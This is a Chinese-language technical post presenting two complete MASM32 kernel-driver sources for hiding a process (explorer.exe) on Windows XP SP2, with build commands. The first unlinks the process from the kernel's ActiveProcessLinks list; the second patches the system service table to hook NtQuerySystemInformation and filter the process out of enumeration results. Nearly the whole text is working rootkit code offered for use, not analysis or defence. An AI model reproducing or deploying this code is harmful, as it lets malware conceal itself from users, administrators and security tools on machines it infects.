作者:dge

进程隐藏的两种方法
这两种都是很古老的方法，因为无聊，所以写了一下。代码在XP_SP2下调试通过.

(1).从活动进程链表（ActiveProcessLinks）中摘除自身,这种方法可以欺骗任务管理器，
下面这个程序做的就是双向链表的删除节点和插入节点，十分的简单。

;f:\masm32\bin\ml /nologo /c /coff HideProcess_ActiveProcessLinks.asm
;f:\masm32\bin\link /nologo /driver /base:0x10000 /align:32 /out:HideProcess_ActiveProcessLinks.sys /subsystem:native HideProcess_ActiveProcessLinks.obj

.386
.model flat, stdcall
option casemap:none
;----------------------------------------------------------------------------------------------------
;                                 I N C L U D E   F I L E S                                        
;----------------------------------------------------------------------------------------------------
include f:\masm32\include\w2k\ntstatus.inc
include f:\masm32\include\w2k\ntddk.inc
include f:\masm32\include\w2k\ntoskrnl.inc
include f:\masm32\include\w2k\w2kundoc.inc
includelib f:\masm32\lib\w2k\ntoskrnl.lib
include f:\masm32\Macros\Strings.mac

_DriverUnload proto :PDRIVER_OBJECT
_DispatchControlIo proto :PDEVICE_OBJECT,:PIRP

;----------------------------------------------------------------------------------------------------
;                                 C O N S T A N T S                                             
;----------------------------------------------------------------------------------------------------

.const
CCOUNTED_UNICODE_STRING "\\Device\\devHideprocess", g_usDeviceName, 4
CCOUNTED_UNICODE_STRING "\\??\\slHideprocess", g_usSymbolicLinkName, 4

.data
szHide                  db   'explorer.exe',0
Flink                   dd   ?
Blink                   dd   ?
Explorer                dd   ?
;----------------------------------------------------------------------------------------------------
;                                 C O D E                                  
;----------------------------------------------------------------------------------------------------

.code

DriverEntry proc uses ebx edi esi, pDriverObject:PDRIVER_OBJECT, pusRegistryPath:PUNICODE_STRING
 local status:NTSTATUS
 local pDeviceObject:PDEVICE_OBJECT
 local   dwId,lpEprocess
        local   ListOffset,NameOffset
 local   IdOffset
 local   Version
         
;       int 3
; invoke DbgPrint,$CTA0("\n\nEntry  DriverEntry\n\n")
 mov status,STATUS_DEVICE_CONFIGURATION_ERROR

 invoke IoCreateDevice,pDriverObject,0,addr g_usDeviceName,FILE_DEVICE_UNKNOWN,0,FALSE,addr pDeviceObject
 .if     eax==STATUS_SUCCESS
         mov eax,pDriverObject
  assume eax:ptr DRIVER_OBJECT
  mov [eax].DriverUnload,  offset _DriverUnload
  assume eax:nothing
  ;获得得系统版本
  invoke  PsGetVersion,NULL,addr Version,NULL,NULL
                mov     eax,Version
  cmp     eax,0
  jne     l1
  mov     ListOffset,0A0h
  mov     NameOffset,1fch
  jmp     l2
        l1:     cmp     eax,1
         jne     exit
  mov     ListOffset,88h
  mov     NameOffset,174h
        l2:     invoke  PsGetCurrentProcessId
         mov     dwId,eax
         invoke  PsLookupProcessByProcessId,dwId,addr lpEprocess
  mov     esi,lpEprocess
  add     esi,ListOffset
  mov     edi,esi
                assume  edi:PLIST_ENTRY
         assume  esi:PLIST_ENTRY   
        l3:     mov     edx,[esi].Flink
         ;比较是否为最后一个EPROCESS
                cmp     edx,edi
  je      l4
  assume  esi:nothing
  sub     esi,ListOffset
  add     esi,NameOffset
  invoke  strcmp,esi,addr szHide
  .if     eax == 0
          sub     esi,NameOffset
          add     esi,ListOffset
          mov     Explorer,esi
   assume  esi:PLIST_ENTRY
   assume  ebx:PLIST_ENTRY
   assume  eax:PLIST_ENTRY
                        ;删除节点
   mov     eax,[esi].Flink
   mov     ebx,[esi].Blink
   mov     [ebx].Flink,eax
   mov     [eax].Blink,ebx
   mov     Flink,eax
   mov     Blink,ebx
   assume  eax:nothing
   assume  ebx:nothing

   invoke DbgPrint,$CTA0("\n\n************hide process successful ***********\n\n")
   jmp     l4
                .endif
  ;恢复EPROCESS指针
                sub     esi,NameOffset
                add     esi,ListOffset
                assume  esi:PLIST_ENTRY
                mov     esi,[esi].Flink
                jmp     l3 
l4:
         assume  esi:nothing
                assume  edi:nothing                 
                mov     status,STATUS_SUCCESS       
exit:      
 .endif
 mov     eax,status
 ret
        mov     eax,STATUS_DEVICE_CONFIGURATION_ERROR
        ret
DriverEntry endp

;----------------------------------------------------------------------------------------------------
;                                 D R I V E R U N L O A D                                           
;----------------------------------------------------------------------------------------------------

_DriverUnload proc pDriverObject:PDRIVER_OBJECT

;       int 3
; invoke DbgPrint,$CTA0("\n\nEntry DriverUnload\n\n")
        pushad

        mov     eax,Flink
 mov     ebx,Explorer
 assume  ebx:PLIST_ENTRY
 assume  eax:PLIST_ENTRY
 ;恢复被摘除的节点
 mov     [eax].Blink,ebx
 mov     [ebx].Flink,eax

 mov     eax,Blink
 mov     [eax].Flink,ebx
 mov     [ebx].Blink,eax
 
 popad
 ;清除符号连接
 invoke IoDeleteSymbolicLink,addr g_usSymbolicLinkName
 mov eax, pDriverObject
 ;删除在初始化创建的设备
 invoke IoDeleteDevice,(DRIVER_OBJECT PTR [eax]).DeviceObject
 
 ret

_DriverUnload endp
;----------------------------------------------------------------------------------------------------
;                                 E N D                                           
;----------------------------------------------------------------------------------------------------

end DriverEntry

（2）.如果你反汇编taskmgr.exe,可以在发现taskmgr.exe是通过NtQuerySystemInformation枚举进程的，
因此可以通过挂钩系统服务NtQuerySystemInformation修改这个函数的行为，从而实现在任务管理器中隐藏进程的目的，下面就是实现代码。

;f:\masm32\bin\ml /nologo /c /coff hook_NtQuerySystemInformation.asm
;f:\masm32\bin\link /nologo /driver /base:0x10000 /align:32 /out:hook_NtQuerySystemInformation.sys /subsystem:native hook_NtQuerySystemInformation.obj

.386
.model flat, stdcall
option casemap:none
;----------------------------------------------------------------------------------------------------
;                                 I N C L U D E   F I L E S                                        
;----------------------------------------------------------------------------------------------------

include f:\masm32\include\w2k\ntstatus.inc
include f:\masm32\include\w2k\ntddk.inc
include f:\masm32\include\w2k\native.inc
include f:\masm32\include\w2k\ntoskrnl.inc
includelib f:\masm32\lib\w2k\ntoskrnl.lib
include f:\masm32\Macros\Strings.mac
;----------------------------------------------------------------------------------------------------
;                                 D A T A                                           
;----------------------------------------------------------------------------------------------------
.data
;保存地址
dwOldNtQuerySystemInformation  dd            ?
dwAddr                         dd            ?
;----------------------------------------------------------------------------------------------------
;                                 C O N S T A N T S                                             
;----------------------------------------------------------------------------------------------------
.const
CCOUNTED_UNICODE_STRING "\\Device\\devHideprocess", g_usDeviceName, 4
CCOUNTED_UNICODE_STRING "\\??\\slHideprocess", g_usSymbolicLinkName, 4
CCOUNTED_UNICODE_STRING "explorer.exe", processname, 4
;----------------------------------------------------------------------------------------------------
;                                 C O D E                                  
;----------------------------------------------------------------------------------------------------
.code

NewNtQuerySystemInformation     proc  SysInfoClass,lpSysInfo,SysInfoL,Return
                      
                    invoke NtQuerySystemInformation,SysInfoClass,lpSysInfo,SysInfoL,Return
                    pushad    
      test eax,eax
      jnz   exit
      .if    SysInfoClass == SystemProcessesAndThreadsInformation
             mov     esi,lpSysInfo
      mov     ebx,esi
             add     esi,[esi]

         @@:               add     esi,38h                                        ;在38h偏移处取得进程名字。
                           invoke  RtlCompareUnicodeString,addr processname, esi, 1

      .if    eax== 0
             invoke DbgPrint, $CTA0("\nsuccessful \n")
             .if    dword ptr[esi-38h] == 0
             mov dword ptr[ebx],0
      jmp    exit
             .else
             sub    esi,38h
             mov    edx,[esi]
                                         add    [ebx],edx
 
                                         add    esi,[esi]
             jmp    @B
                                  .endif
             .else
                                  sub    esi,38h
             cmp    dword ptr[esi],0
             jz     exit
             mov    ebx,esi
                                  add    esi,[esi]
      jmp    @B
             .endif
      .endif
                 
  exit:      popad

                    ret

NewNtQuerySystemInformation    endp

;----------------------------------------------------------------------------------------------------
;                                 H O O K F U N C                                          
;----------------------------------------------------------------------------------------------------
HookFunction        proc

                    pushad
;      int 3
;      invoke DbgPrint, $CTA0("\nEntry into hoookfunction\n")
                    ;下面是用KeServiceDescriptorTabled导出符号获得数组的基地址，这个数组中包含有NtXXXX函数的入口地址。
      mov eax, [KeServiceDescriptorTable]
             mov esi, [eax]
      mov esi, [esi]
                    ;下面五句为获取ZwQuerySystemInformation的地址
      mov eax,ZwQuerySystemInformation
      inc eax
      inc eax
      mov eax,[eax]
      mov eax,[eax]
      inc eax
      movzx ecx,byte ptr[eax]
      sal ecx,2
      add esi,ecx
      mov dwAddr,esi
      mov edi,dword ptr[esi]
      ;保存旧的函数地址。
      mov dwOldNtQuerySystemInformation,edi
                    mov edi,offset NewNtQuerySystemInformation
      ;修改入口地址
      cli
      mov dword ptr[esi],edi
      sti
      popad
                    mov eax, STATUS_SUCCESS

      ret

HookFunction     endp

;----------------------------------------------------------------------------------------------------
;                                 DriverUnload                                           
;----------------------------------------------------------------------------------------------------                                
DriverUnload        proc pDriverObject:PDRIVER_OBJECT
;必须保存环境，否则后果很严重。在这个函数中恢复被修改的地址。

                   pushad
;             int 3
;                   invoke DbgPrint, $CTA0("\nEntry into DriverUnload \n")
                    mov esi,dwAddr
             mov eax,dwOldNtQuerySystemInformation
                    cli
             mov dword ptr[esi],eax
             sti
                    invoke IoDeleteSymbolicLink, addr g_usSymbolicLinkName
             mov eax,pDriverObject
             invoke IoDeleteDevice, (DRIVER_OBJECT PTR [eax]).DeviceObject
             popad

             ret

DriverUnload endp

;----------------------------------------------------------------------------------------------------
;                                 D R I V E R E N T R Y                                           
;----------------------------------------------------------------------------------------------------
DriverEntry         proc pDriverObject:PDRIVER_OBJECT, pusRegistryPath:PUNICODE_STRING
                    local status:NTSTATUS
      local pDeviceObject:PDEVICE_OBJECT

;                   int 3
;             invoke DbgPrint, $CTA0("\nEntry into DriverEntry\n")
             mov status, STATUS_DEVICE_CONFIGURATION_ERROR
                    invoke IoCreateDevice, pDriverObject, 0, addr g_usDeviceName, FILE_DEVICE_UNKNOWN, 0, FALSE, addr pDeviceObject
             .if    eax == STATUS_SUCCESS
      mov eax, pDriverObject
      assume eax:ptr DRIVER_OBJECT
      mov [eax].DriverUnload,  offset DriverUnload
                    assume eax:nothing
                           invoke HookFunction
      mov status, STATUS_SUCCESS
             .endif
             mov eax, status

             ret

DriverEntry         endp

end DriverEntry

;----------------------------------------------------------------------------------------------------
;                                 E N D                                          
;----------------------------------------------------------------------------------------------------